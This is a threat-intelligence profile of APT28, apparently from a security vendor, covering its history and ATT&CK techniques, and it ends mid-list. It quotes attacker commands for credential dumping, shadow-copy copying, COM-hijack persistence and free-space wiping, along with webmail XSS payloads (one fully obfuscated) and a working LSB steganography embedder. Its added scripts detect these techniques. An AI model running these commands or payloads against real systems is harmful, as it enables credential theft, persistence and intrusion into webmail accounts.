APT28 Cyber Threat Profile and Detailed TTPs
APT28 has established itself as one of the most persistent and adaptable threat groups active today, operating across political, military, and diplomatic landscapes for more than a decade. First observed in 2009, the group quickly moved from small-scale intrusions to high-impact operations. Its major events include compromises of government, NGO, and media organizations; the 2015 disruption of TV5Monde; the 2016 breaches of the DCCC (Democratic Congressional Campaign Committee) and DNC (Democratic National Committee); the targeting of WADA (World Anti-Doping Agency) and release of athlete data; the Lausanne hotel Wi-Fi intrusion used to reach the CCES (Canadian Centre for Ethics in Sport); the failed 2018 close-access attempt against the OPCW (Organisation for the Prohibition of Chemical Weapons); the "Nearest Neighbor" Wi-Fi technique first used in 2022; large-scale website compromises across Ukrainian government entities in 2023; and the 2025 appearance of LAMEHUG, malware that uses an LLM to generate commands from text descriptions.
Across these operations, APT28 consistently adapts its methods, blending proven tradecraft with new capabilities to match each target environment. The group’s TTPs span the full intrusion lifecycle, involving targeted reconnaissance of Wi-Fi networks, social engineering over secure messaging platforms, and predictive domain registration to build infrastructure in advance. Access vectors combine spearphishing documents, exploitation of webmail vulnerabilities, and proximity-based Wi-Fi attacks. Execution frequently relies on PowerShell, native Windows utilities, and malicious Office macros, while persistence is maintained through logon script manipulation and COM hijacking. Privilege escalation uses vulnerabilities such as CVE-2022-38028, and defense evasion techniques range from steganography and encryption to MOTW bypasses. The group collects data through keylogging, email harvesting, clipboard monitoring, and automated mailbox extraction, and communicates over HTTPS or cloud storage services before exfiltrating stolen information through encrypted uploads.
In this post, we review APT28's major historical operations, highlight its significant campaigns across political, governmental, and international organizations, and analyze its tactics, techniques, and procedures to understand how it conducts sustained and multifaceted cyber operations. Finally, we show how Picus helps defend against this group.
What Are the Major Activities of the APT28 Group?
2009 – Activity attributed to the group began, with targets including military and government entities, non-governmental organizations (NGOs), and journalists [1].
8 April 2015 – The broadcast network of French TV station TV5Monde was compromised and taken off air in a sabotage operation claimed by the "CyberCaliphate," which was assessed to be a false flag operation conducted by the group [1].
March 2016 – A spearphishing campaign was launched targeting personal email accounts of individuals associated with the Hillary Clinton presidential campaign, including the campaign chairman, using shortened links redirecting to spoofed Google login pages.
April 2016 – Networks belonging to the Democratic Congressional Campaign Committee (DCCC) and the Democratic National Committee (DNC) were breached, leading to the exfiltration of thousands of emails and documents [2].
15 June 2016 – The "Guccifer 2.0" online persona was created to claim responsibility for the DNC breach and disseminate stolen documents, falsely presenting the intrusion as the work of a lone hacktivist.
August 2016 – The World Anti-Doping Agency (WADA) was targeted; stolen medical records of athletes were subsequently leaked under the guise of the "Fancy Bears' Hack Team" [1].
September 2016 – An on-site compromise of a Wi-Fi network at a hotel in Lausanne, Switzerland, was used to target a senior official from the Canadian Centre for Ethics in Sport (CCES) and subsequently compromise the CCES network [3].
February 2018 – Ministries of Foreign Affairs in Europe and North America were targeted using a "Jane's 360" defense event lure to deliver the SofacyCarberp payload via malicious Excel macros [4].
April 2018 – An attempted close-access hacking operation targeting the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague was disrupted, leading to the seizure of equipment used to compromise Wi-Fi networks [3].
September 2019 – A broad credential harvesting campaign was initiated against more than 200 organizations, including political campaigns and policy organizations, utilizing brute force and password spray tactics routed through the Tor network [5].
February 2022 – A "Nearest Neighbor" attack vector was employed, where compromised Wi-Fi networks at adjacent organizations were used to gain proximity access to a target’s corporate Wi-Fi network, facilitated by a zero-day privilege escalation vulnerability (CVE-2022-38028) in the Windows Print Spooler service [6].
February 2023 – Reflected cross-site scripting (XSS) vulnerabilities on Ukrainian government websites were exploited to redirect users to phishing pages designed to steal webmail credentials [7].
10 July 2025 – The LAMEHUG malware, which integrates Large Language Model (LLM) capabilities to generate commands based on text descriptions, was deployed against Ukrainian government officials [8].
Which MITRE ATT&CK Techniques Are Used by APT28?
The following is a comprehensive analysis of the Tactics, Techniques, and Procedures (TTPs) attributed to APT28. This analysis aggregates intelligence observed across multiple campaigns, including the "Nearest Neighbor" attack, campaigns targeting Ukrainian military personnel via Signal, and Operation RoundPress [4][6][9][10].
Tactic: Reconnaissance
T1595.002 Active Scanning: Vulnerability Scanning
To discover potential entry vectors into a target network, the adversary deployed a custom PowerShell script on compromised systems belonging to neighboring organizations. This script was utilized to enumerate and examine wireless networks within the range of a dual-homed system's wireless adapter. Through this activity, the Service Set Identifier (SSID) of the intended target's enterprise Wi-Fi network was identified.
T1598 Phishing for Information
In specific campaigns, Ukrainian military administration and command personnel were targeted to identify wounded personnel, associated chains of command, units, and equipment provisioning trails. To facilitate this, the threat actor engaged targets via private chats on the Signal messaging application. By posing as a superior or colleague, the adversary created a false sense of urgency, invoking legal threats or compensation decisions, to pressure victims into performing actions or providing sensitive information.
Tactic: Resource Development
T1583.001 Acquire Infrastructure: Domains
The adversary registered new domains and populated them with default landing pages, which were reused over the course of a year. These pages contained specific strings, such as "866-593-54352", "522 Clematis. Suite 3000", and "403-965-2341", which allowed for the prediction of C2 domains like cdnverify[.]net prior to their active use. Additionally, specific domains were acquired to support "Operation RoundPress," including:
- hijx[.]xyz
T1583.004 Acquire Infrastructure: Server
Virtual Private Servers (VPS) were utilized to host command and control infrastructure. These servers were hosted by various providers, including GLOBALAXS NOC PARIS, 23VNet Kft, Administrat, Belcloud, M247 Europe SRL, and HOSTGNON LTD.
T1583.006 Acquire Infrastructure: Web Services
Legitimate cloud storage services were leveraged to facilitate command and control (C2) operations. Accounts were registered on platforms such as Icedrive and Koofr, including specific accounts like Alan_Smith2304@outlook[.]com and jakub2233@tutamail[.]com. These accounts hosted distinct storage containers for storing malware payloads and depositing exfiltrated data.
T1587.001 Develop Capabilities: Malware
Open-source frameworks were modified to suit operational requirements. The Covenant framework, specifically the GruntHTTPStager, was utilized with a custom C2Bridge to allow interaction with the Koofr API.
Additionally, a custom C++ malware named BeardShell was developed to execute PowerShell commands and interact with Icedrive.
For webmail operations, a specialized JavaScript framework named "SpyPress" was created with four variants: SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA.
T1588.002 Obtain Capabilities: Tool
The open-source tool Luckystrike was assessed to have been used for generating malicious delivery documents. Macros found in delivery documents bore a close resemblance to those generated by Luckystrike.
Tactic: Initial Access
T1190 Exploit Public-Facing Application
Initial access to victims' webmail sessions was obtained via spearphishing emails that carried Cross-Site Scripting (XSS) payloads for public-facing webmail servers. The malicious code was embedded in an email header or directly in the HTML body and executed in the victim's browser, inside the authenticated webmail session, as soon as the message was rendered; no attachment had to be opened.
- Roundcube (CVE-2023-43770): Exploited a regex failure in rcube_string_replacer.php to inject script tags.
- MDaemon (CVE-2024-11182): Leveraged a zero-day vulnerability where the HTML parser incorrectly rendered an img tag following a noembed end tag inside a p element's title attribute.
- Zimbra (CVE-2024-27443): Exploited a failure to sanitize the cif attribute populated from the X-Zimbra-Calendar-Intended-For header.
- Horde: Attempted to exploit a legacy XSS flaw using the onerror attribute of an img element.
T1566.001 Phishing: Spearphishing Attachment
Phishing emails were sent with subject lines such as "Upcoming Defense events February 2018". The sender address was spoofed to resemble events@ihsmarkit.com, and the email contained a malicious Excel XLS attachment named "Upcoming Events February 2018.xls".
T1566.003 Phishing: Spearphishing via Service
Weaponized Office documents were delivered directly via private Signal chats on the desktop version of the application. These documents mimicked official Ukrainian military forms such as medical compensation requests and personnel reports. This method was strategic because files saved by Signal Desktop carry no Mark-of-the-Web (MOTW), so Microsoft Office treated them as local files rather than Internet-sourced ones and did not raise its standard security flags.
T1669 Wi-Fi Networks
The proximity of neighboring organizations was leveraged to connect to a target's corporate Wi-Fi network. By compromising a dual-homed system (connected via both Wi-Fi and wired Ethernet) at a nearby location, the adversary bridged the physical gap and established a connection to the target's wireless network without being on-site. This "Nearest Neighbor" attack later involved re-establishing access via the target's Guest Wi-Fi, which was not fully isolated from the wired corporate network.
Tactic: Execution
T1059.001 Command and Scripting Interpreter: PowerShell
PowerShell was used extensively to facilitate the "Nearest Neighbor" attack, compress files, and execute commands.
- Archiving: Commands were executed to compress exported registry hives and large files from volume shadow copies into ZIP archives.
    Powershell -c "Get-ChildItem C:\ProgramData\sam.save, C:\ProgramData\security.save, C:\ProgramData\system.save | Compress-Archive -DestinationPath C:\ProgramData\out.zip"
- BeardShell Execution: The BeardShell backdoor, despite being written in C++, loaded the CLR and System.Management.Automation assembly to create PowerShell instances. It utilized JSON sequences to manage sessions, such as:
    1. {}: Creates a new PowerShell session.
T1059.003 Command and Scripting Interpreter: Windows Command Shell
The Windows Command Shell was employed to run native utilities (reg.exe, netsh.exe, cipher.exe) and batch scripts.
- Registry Saves: A batch file named servtask.bat was executed to invoke registry saves.
    reg save hklm\sam C:\ProgramData\sam.save
- Payload Execution: A command was used to execute a malicious DLL via rundll32.exe.
    start rundll32.exe "C:\Users\user\AppData\Local\cdnver.dll",#1
T1059.005 Command and Scripting Interpreter: Visual Basic
Weaponized Excel and Word documents contained malicious VBA macros responsible for dropping payloads, establishing persistence, and revealing hidden content.
- API Declaration: Macros declared Windows API functions based on the host's VBA version.
    'VBA6
- Content Reveal: Content hidden by white font was revealed using VBA.
    ActiveSheet.Range("a1:c54").Font.Color = vbBlack
T1106 Native API
Malware extensively utilized Windows API functions. VBA macros used CreateProcessW for execution and GetFileAttributesW (aliased as GetImageResolution) to check for file existence.
The BeardShell backdoor leveraged LoadLibrary, GetProcAddress, and GetModuleFileNameW to facilitate execution and DLL proxying.
T1203 Exploitation for Client Execution
In the "Operation RoundPress" campaign, injected JavaScript executed within the victim's browser session upon rendering the malicious email.
- Horde Payload: Used an img tag with an undefined source to trigger an onerror event that evaluated a Base64 payload.
    <img src=x onerror=window.parent.eval(atob(...))>
- MDaemon Payload: Leveraged a parser bug to force the rendering of a malicious image tag.
    <p title="</noembed><img src=x onerror=...>">
- Roundcube Payload: Bypassed sanitization to inject script tags directly.
    <a href="..."><script>...</script></a>
- Zimbra Payload: Targeted a hidden div element (a-cashed-skinLayout2) containing the payload, triggered via the X-Zimbra-Calendar-Intended-For header.
    Zimbra-Calendar<img/alt="/src='Zimbra-Calendar/onerror=\"window[(function(tmz){ghwa='cxe'; return '\\x65'+decodeURI('%76')+'\\x61\\x6c'})()](window[(function(jvqka){const kqd=decodeURI('%61')+'\t'+decodeURI('%6F')+'\\x62'; oykbg='doix'; return kqd})()](frames[0].document.getElementById('a-cashed-skinLayout2')['\inn\e\r\T\e\xt']))\">
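The injection shapes listed for the four webmail products can be checked at the mail gateway or during incident triage, before a message ever reaches a browser. The script below is an added example written for this post, not code from ESET's report or from Picus. It parses raw RFC 822 messages with the Python standard library and reports which structural indicators fire: an img element with an onerror handler, a </noembed> closing tag inside a p element's title attribute, a script element nested in an anchor, an eval(atob(...)) loader, and any HTML markup inside the X-Zimbra-Calendar-Intended-For header. The indicator names and the sample messages are constructed for the example; the payload bodies in them are inert placeholders.

```python
import email
import re
from email import policy

# Structural indicators distilled from the four payload shapes described above.
# Each regex runs over the decoded text/html body of a message.
HTML_PATTERNS = {
    # Horde / MDaemon / Zimbra: an <img> whose src never resolves, carrying an onerror handler
    "img_onerror": re.compile(r"<img[^>]*\bonerror\s*=", re.I),
    # MDaemon parser bug: a </noembed> closing tag hidden inside a <p title="..."> attribute
    "noembed_in_title_attr": re.compile(r"""<p[^>]*\btitle\s*=\s*["'][^"']*</noembed>""", re.I),
    # Roundcube: a <script> element nested directly inside an anchor
    "script_in_anchor": re.compile(r"<a\b[^>]*>\s*<script\b", re.I),
    # Generic loader used by the Horde payload
    "eval_atob": re.compile(r"\beval\s*\(\s*atob\s*\(", re.I),
}

# Headers the webmail client copies into its DOM. Markup here is never legitimate.
DOM_REFLECTED_HEADERS = ("X-Zimbra-Calendar-Intended-For",)
ANY_TAG = re.compile(r"<[a-z!/][^>]*>", re.I)


def scan_message(raw: bytes) -> list:
    """Return the sorted list of indicator names found in one raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = set()
    for header in DOM_REFLECTED_HEADERS:
        for value in msg.get_all(header, []):
            if ANY_TAG.search(str(value)):
                hits.add(f"markup_in_header:{header}")
    for part in msg.walk():                       # handles multipart/alternative and friends
        if part.get_content_type() == "text/html":
            body = part.get_content()
            for name, pattern in HTML_PATTERNS.items():
                if pattern.search(body):
                    hits.add(name)
    return sorted(hits)


# Constructed sample messages (not real captures).
SAMPLE_HORDE = b"""From: sender@example.test
To: victim@example.test
Subject: report
Content-Type: text/html; charset=utf-8

<html><body><p>see attached</p>
<img src=x onerror=window.parent.eval(atob('YWxlcnQoMSk='))>
</body></html>
"""

SAMPLE_MDAEMON = b"""From: sender@example.test
To: victim@example.test
Subject: invoice
Content-Type: text/html; charset=utf-8

<html><body><p title="</noembed><img src=x onerror=alert(1)>">invoice</p></body></html>
"""

SAMPLE_ROUNDCUBE = b"""From: sender@example.test
To: victim@example.test
Subject: link
Content-Type: text/html; charset=utf-8

<html><body><a href="https://example.test/"><script>alert(1)</script></a></body></html>
"""

SAMPLE_ZIMBRA = b"""From: sender@example.test
To: victim@example.test
Subject: meeting
X-Zimbra-Calendar-Intended-For: Zimbra-Calendar<img/alt="/src='x'/onerror=alert(1)">
Content-Type: text/html; charset=utf-8

<html><body><p>meeting notes</p></body></html>
"""

SAMPLE_BENIGN = b"""From: newsletter@example.test
To: victim@example.test
Subject: weekly
Content-Type: text/html; charset=utf-8

<html><body><a href="https://example.test/"><img src="https://example.test/logo.png" alt="logo"></a></body></html>
"""

if __name__ == "__main__":
    for label, sample in [("horde", SAMPLE_HORDE), ("mdaemon", SAMPLE_MDAEMON),
                          ("roundcube", SAMPLE_ROUNDCUBE), ("zimbra", SAMPLE_ZIMBRA),
                          ("benign", SAMPLE_BENIGN)]:
        print(f"{label:10s} {scan_message(sample)}")
```

These are pattern checks, so attribute-encoding or entity-splitting tricks can slip past them; the durable fix is patching the webmail server and sending a Content-Security-Policy that forbids inline script. The scanner is for gateway triage and for sweeping mail stores after the fact.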
T1204.002 User Execution: Malicious File
Infection relied on victims opening weaponized documents received via Signal or phishing emails. The lack of MOTW on Signal files permitted macros to run without standard security blocks, while Excel documents used white-on-white text to trick users into enabling macros to view content.
Tactic: Persistence
T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)
Persistence was established by writing the path of a malicious batch file to the HKCU\Environment\UserInitMprLogonScript registry key, ensuring the payload executed upon user login.
T1546.015 Event Triggered Execution: Component Object Model Hijacking
A malicious macro registered a new COM server to establish persistence. Using reg.exe, a registry key was added to point to a malicious DLL, ensuring it loaded with explorer.exe at login.
    reg.exe add HKCU\Software\classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\InProcServer32 /d "C:\ProgramData\prnfldr.dll" /f
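Both persistence locations above can be audited from a registry export without touching the live hive. The script below is an added example for this post (not Unit 42's or Picus's code): it parses .reg export text, reports any HKCU\Environment\UserInitMprLogonScript value, and flags every per-user CLSID\{...}\InProcServer32 registration that shadows a CLSID also registered under HKLM, which is the COM-hijacking condition, because a process that resolves the CLSID consults HKCU\Software\Classes before HKLM. The two exports are constructed samples; the HKLM server path for the Printers CLSID is a placeholder, not the real value.

```python
import re

KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
HKCU_INPROC = re.compile(r"^HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\(\{[0-9A-Fa-f-]+\})\\InProcServer32$", re.I)
HKLM_INPROC = re.compile(r"^HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\(\{[0-9A-Fa-f-]+\})\\InProcServer32$", re.I)
LOGON_SCRIPT_KEY = "HKEY_CURRENT_USER\\Environment"


def _unescape(s: str) -> str:
    # .reg files escape backslashes and double quotes inside string data
    return s.replace("\\\\", "\\").replace('\\"', '"')


def parse_reg_export(text: str) -> dict:
    """Parse 'reg export' text into {key_path: {value_name: string_data}}.
    Only REG_SZ values (quoted data) are kept; the default value is stored under ''.
    Real exports are UTF-16LE files: decode them before calling this."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_LINE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
            data = m.group(2)
            if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                keys[current][name] = _unescape(data[1:-1])
    return keys


def audit_user_persistence(hkcu_export: str, hklm_export: str) -> list:
    """Return (finding, detail) tuples for the logon-script and COM-hijack conditions."""
    hkcu = parse_reg_export(hkcu_export)
    hklm = parse_reg_export(hklm_export)
    machine_servers = {}
    for key, values in hklm.items():
        m = HKLM_INPROC.match(key)
        if m:
            machine_servers[m.group(1).upper()] = values.get("", "")
    findings = []
    script = hkcu.get(LOGON_SCRIPT_KEY, {}).get("UserInitMprLogonScript")
    if script:
        findings.append(("logon_script", script))
    for key, values in hkcu.items():
        m = HKCU_INPROC.match(key)
        if not m:
            continue
        clsid = m.group(1).upper()
        if clsid in machine_servers:   # the per-user entry wins over the machine-wide one
            findings.append(("com_hijack",
                             f"{clsid} -> {values.get('', '')} (shadows {machine_servers[clsid]})"))
    return findings


# Constructed sample exports (not real registry dumps).
HKCU_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Environment]
"TEMP"="%USERPROFILE%\\AppData\\Local\\Temp"
"UserInitMprLogonScript"="C:\\ProgramData\\servtask.bat"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\InProcServer32]
@="C:\\ProgramData\\prnfldr.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InProcServer32]
@="C:\\Users\\user\\AppData\\Local\\PerUserApp\\app.dll"
"""

HKLM_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\InProcServer32]
@="C:\\Windows\\System32\\placeholder.dll"
"ThreadingModel"="Apartment"
"""

if __name__ == "__main__":
    for finding in audit_user_persistence(HKCU_EXPORT, HKLM_EXPORT):
        print(*finding)
```

The per-user CLSID that has no HKLM counterpart is deliberately not reported: per-user installers register such entries legitimately, and the signal for a hijack is the shadowing, not the mere presence of an HKCU server. Any UserInitMprLogonScript value is reported, since that value is rarely set by administrators.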
Tactic: Privilege Escalation
T1068 Exploitation for Privilege Escalation
The post-compromise tool GooseEgg was utilized to exploit CVE-2022-38028, a vulnerability in the Microsoft Windows Print Spooler service. This activity facilitated privilege escalation on the compromised system.
Tactic: Defense Evasion
T1027 Obfuscated Files or Information
Multiple obfuscation techniques were employed to conceal operations:
- Steganography: Shellcode was concealed within valid PNG files (e.g., windows.png, koala.png) in the Least Significant Bit (LSB) of each of the 4 bytes (RGBA channels) of every pixel. The extracted payload included the key, IV, and AES-CBC encrypted content.
- String Encryption: Strings in compiled binaries were encrypted using a single-byte XOR cipher.
- Visual Obfuscation: Macros applied white font color to hide text within documents.
- Certificate Masquerading: Payloads were Base64 encoded and enclosed between -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- strings.
- JavaScript Obfuscation: SpyPress payloads randomized variable and function names and kept critical strings (like C2 URLs) in an encrypted list.
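To make the steganography item concrete: the extraction logic is nothing more than reading the lowest bit of every channel byte and reassembling bytes from those bits. The Python below is an added illustration written for this post, not the malware's loader and not code from the cited reports. It embeds and recovers a blob from a raw RGBA pixel buffer (the PNG container is left out, so the buffer stands in for the decoded image), splits the result into key, IV and ciphertext using sizes that are assumptions (32 and 16 bytes; the page gives none), and shows a coarse triage heuristic: the share of 1-bits in the LSB plane of the region carrying an encrypted payload sits near 0.5, which stands out against a flat image region. The 4-byte length prefix is this example's own convention, and the carrier and payload bytes are constructed. AES-CBC decryption of the recovered slices is left to a crypto library.

```python
import hashlib
import struct

LENGTH = struct.Struct("<I")       # assumption: 4-byte little-endian length prefix (example convention)
KEY_LEN, IV_LEN = 32, 16           # assumed AES-256-CBC key and IV sizes


def embed_lsb(carrier: bytes, payload: bytes) -> bytearray:
    """Write payload bits into the least significant bit of consecutive carrier bytes,
    i.e. one bit per R, G, B or A byte, most significant bit of each payload byte first."""
    blob = LENGTH.pack(len(payload)) + payload
    if len(blob) * 8 > len(carrier):
        raise ValueError("carrier too small for payload")
    out = bytearray(carrier)
    pos = 0
    for byte in blob:
        for shift in range(7, -1, -1):
            out[pos] = (out[pos] & 0xFE) | ((byte >> shift) & 1)
            pos += 1
    return out


def _read_bytes(carrier: bytes, offset: int, count: int):
    value = 0
    for i in range(count * 8):
        value = (value << 1) | (carrier[offset + i] & 1)
    return value.to_bytes(count, "big"), offset + count * 8


def extract_lsb(carrier: bytes) -> bytes:
    """Recover the embedded blob: read the length prefix, then that many bytes."""
    header, offset = _read_bytes(carrier, 0, LENGTH.size)
    (length,) = LENGTH.unpack(header)
    if length * 8 > len(carrier) - offset:
        raise ValueError("declared payload length exceeds carrier")
    body, _ = _read_bytes(carrier, offset, length)
    return body


def split_payload(blob: bytes):
    """Assumed layout: key || IV || AES-CBC ciphertext."""
    return blob[:KEY_LEN], blob[KEY_LEN:KEY_LEN + IV_LEN], blob[KEY_LEN + IV_LEN:]


def lsb_ones_ratio(carrier: bytes, nbytes: int) -> float:
    """Share of 1-bits in the LSB plane of the first nbytes channel bytes."""
    return sum(b & 1 for b in carrier[:nbytes]) / nbytes


def make_carrier(width: int = 64, height: int = 64) -> bytes:
    # Constructed RGBA buffer: a smooth gradient whose LSB plane is all zero, an idealised
    # flat region. Real photographs are noisier, so treat the ratio as triage, not proof.
    return bytes(((i // 64) * 2) & 0xFF for i in range(width * height * 4))


def demo() -> dict:
    key = hashlib.sha256(b"example key").digest()                # constructed stand-in for the real key
    iv = hashlib.sha256(b"example iv").digest()[:IV_LEN]
    ciphertext = hashlib.sha256(b"example ct").digest() * 2      # pseudo-random bytes standing in for AES-CBC output
    carrier = make_carrier()
    stego = embed_lsb(carrier, key + iv + ciphertext)
    recovered = extract_lsb(stego)
    k, v, c = split_payload(recovered)
    used = (LENGTH.size + len(recovered)) * 8                    # channel bytes touched by the embedding
    return {
        "roundtrip_ok": recovered == key + iv + ciphertext,
        "key": k, "iv": v, "ciphertext": c,
        "lsb_ratio_clean": lsb_ones_ratio(carrier, used),
        "lsb_ratio_stego": lsb_ones_ratio(stego, used),
    }


if __name__ == "__main__":
    r = demo()
    print("roundtrip", r["roundtrip_ok"], "key/iv/ct sizes", len(r["key"]), len(r["iv"]), len(r["ciphertext"]))
    print("LSB ones ratio clean=%.3f stego=%.3f" % (r["lsb_ratio_clean"], r["lsb_ratio_stego"]))
```

The ratio check is useful only on a known-clean baseline of the same image type; a hash comparison of windows.png against the pristine file it imitates, or simply the presence of a PNG in %localappdata% that no installed application wrote, is a stronger indicator in practice.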
T1036.005 Masquerading: Match Legitimate Name or Location
The malicious DLL prnfldr.dll was placed in C:\ProgramData\, mimicking a legitimate library associated with printer folders. The malware proxied exports of the legitimate DLL to maintain standard printing operations and avoid suspicion.
T1036.008 Masquerading: Masquerade File Type
Additionally, archive files created for exfiltration were renamed with innocuous extensions such as .mp4 and .wav to resemble benign media files.
T1055 Process Injection
Malware attempted to inject code into running browser processes to handle C2 communications. It searched for processes like firefox.exe, chrome.exe, and iexplore.exe by comparing hashed process names against hardcoded values.
T1070.004 Indicator Removal: File Deletion
Files and folders created during operations were removed to conceal traces of the intrusion. The native Windows utility cipher.exe was then used to overwrite unallocated space on the volume, so the deleted files could not be carved back from disk. Note that cipher /W only scrubs free space and leaves live files untouched, but it also destroys every other previously deleted file on the volume; the command itself is therefore a strong indicator whenever it appears in process telemetry outside a planned decommissioning.
    cmd.exe /c cipher /W:C
T1140 Deobfuscate/Decode Files or Information
VBA macros included routines to deobfuscate data at runtime by replacing character pairs to reconstruct valid commands.
    With ActiveDocument.Content.Find
Additionally, the certutil -decode command was used to transform Base64 encoded text files into executables.
T1497.001 Virtualization/Sandbox Evasion: System Checks
BeardShell performed anti-analysis checks immediately upon thread creation, terminating execution if the host had less than 2 GB of RAM or only one processor.
T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass
By delivering malicious documents via Signal Desktop, the Mark-of-the-Web (MOTW) protection was bypassed. Signal Desktop does not write the Zone.Identifier alternate data stream to saved files, so Microsoft Office neither opened them in Protected View nor applied its default policy of blocking macros in files from the Internet; both controls key on MOTW, and without it the user saw the ordinary "Enable Content" prompt instead of a hard block.
T1564.001 Hide Artifacts: Hidden Files and Directories
Malicious macros set the hidden attribute on dropped payloads (e.g., windows.png, prnfldr.dll) through the Windows file-attribute API, reducing their visual footprint. (The GetFileAttributesW import noted above only reads attributes and served the existence checks; setting the hidden bit requires SetFileAttributesW.)
T1574 Hijack Execution Flow
DLL proxying was utilized by the malicious prnfldr.dll, which acted as a proxy for the legitimate DLL. Upon loading, it retrieved addresses of genuine functions from the real library and forwarded calls to them.
A similar technique was observed with the SlimAgent tool proxying eapphost.dll.
Tactic: Credential Access
T1003.001 OS Credential Dumping: LSASS Memory
The rundll32.exe utility was used to execute the MiniDump function exported by comsvcs.dll to dump the memory of the LSASS process.
T1003.002 OS Credential Dumping: Security Account Manager
Credentials were harvested by exporting sensitive registry hives. The reg.exe utility was used to save the System, Security, and SAM hives to C:\ProgramData for exfiltration.
T1003.003 OS Credential Dumping: NTDS
The Active Directory database (ntds.dit) was targeted for credential access.
- Vssadmin: Used to create shadow copies and copy the system hive and database.
    vssadmin create shadow /for=C: /quiet
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM [dest]
- Ntdsutil: Leveraged to export the Active Directory database.
T1056.003 Input Capture: Web Portal Capture
SpyPress variants injected hidden HTML input fields into webmail pages to capture password manager autofills or user keystrokes.
- Horde: Created inputs named horde_user and horde_pass with 0% opacity.
- MDaemon: Used User and Password inputs.
- Zimbra: Used username and password inputs.
- Roundcube: Used _user and _pass inputs. Data was exfiltrated immediately upon entry via a change event listener.
T1110.003 Brute Force: Password Spraying
Password-spray attacks were conducted against Internet-facing web services to identify valid accounts prior to breaching the network.
Additionally, a Kubernetes cluster was operated to conduct distributed, large-scale password spraying and guessing, often routed through commercial VPN services and Tor, so that attempts arrived from many unrelated source addresses.
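Spraying shows up in authentication logs as many distinct accounts failing a small number of times each, rather than one account failing many times. The Python below is an added detection example written for this post, not Microsoft's or Picus's logic. It slides a time window over failed logons grouped by a caller-chosen key and reports groups in which at least min_accounts distinct users each failed at most max_per_account times. Grouping by source address catches a single-exit spray; because the traffic described above is rotated through VPN and Tor exits, the same function is also run with a constant key so the distinct-account count is evaluated across all sources at once. The events are constructed and the thresholds are starting points, not published tuning.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def detect_password_spray(events, key=lambda ev: ev["src"], window=timedelta(minutes=30),
                          min_accounts=10, max_per_account=2):
    """Return one finding per group whose failed logons, inside some `window`, cover at least
    `min_accounts` distinct users with no user failing more than `max_per_account` times."""
    by_group = defaultdict(list)
    for ev in events:
        if ev["result"] == "failure":
            by_group[key(ev)].append((datetime.fromisoformat(ev["time"]), ev["user"].lower()))
    findings = []
    for group, attempts in by_group.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:   # shrink the window from the left
                start += 1
            per_user = Counter(user for _, user in attempts[start:end + 1])
            if len(per_user) >= min_accounts and max(per_user.values()) <= max_per_account:
                findings.append({"group": group, "accounts": len(per_user),
                                 "first": attempts[start][0].isoformat(),
                                 "last": attempts[end][0].isoformat()})
                break          # one finding per group is enough for triage
    return findings


def sample_events():
    """Constructed logon events (not real telemetry) covering three cases."""
    base = datetime(2025, 3, 2, 9, 0)
    events = []
    # 1) spray from a single source: 15 accounts, one failure each
    for i in range(15):
        events.append({"time": (base + timedelta(minutes=i)).isoformat(), "src": "198.51.100.7",
                       "user": f"user{i:02d}", "result": "failure"})
    # 2) brute force of one account from one source: many failures, one user (not a spray)
    for i in range(6):
        events.append({"time": (base + timedelta(minutes=i)).isoformat(), "src": "192.0.2.10",
                       "user": "admin", "result": "failure"})
    # 3) spray rotated through exit nodes: every attempt from a different address
    for i in range(12):
        events.append({"time": (base + timedelta(hours=2, minutes=i)).isoformat(),
                       "src": f"203.0.113.{i + 1}", "user": f"svc{i:02d}", "result": "failure"})
    events.append({"time": (base + timedelta(hours=2, minutes=20)).isoformat(), "src": "192.0.2.10",
                   "user": "admin", "result": "success"})
    return events


if __name__ == "__main__":
    evs = sample_events()
    print("per source:", detect_password_spray(evs))
    print("all sources:", detect_password_spray(evs, key=lambda ev: "all"))
```

Per-source grouping finds only the first spray; the constant key finds the rotated one as well, at the cost of treating the whole tenant as one group, so on a large directory the thresholds must be raised or a second key such as user agent or ASN used instead.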
T1187 Forced Authentication
To facilitate credential harvesting, SpyPress.ROUNDCUBE forced victims to log out by creating an iframe that triggered a logout task. This compelled users to re-enter credentials into the compromised login flow.
    let frame = get_window_parent_parent().document.createElement("iframe");
Tactic: Discovery
T1012 Query Registry
Malicious macros verified the installation of specific .NET Framework versions by checking for the existence of the directory C:\Windows\Microsoft.NET\Framework\v4.0.30319 to ensure support for subsequent payloads.
T1016 System Network Configuration Discovery
Reconnaissance tasks were executed on infected hosts through the Covenant framework. These tasks included using tracert to map network routes, performing ARP scans, and issuing GetNetworkInfo requests.
T1033 System Owner/User Discovery
BeardShell retrieved the current username and workstation name using the Windows API NetWkstaUserGetInfo with parameter 1. This data was used to generate a unique identifier for the infected host.
T1057 Process Discovery
The Covenant implant enumerated running processes to identify targets of interest or security software.
Additionally, malware hashed process names derived from SystemProcessInformation to identify web browsers for injection.
T1082 System Information Discovery
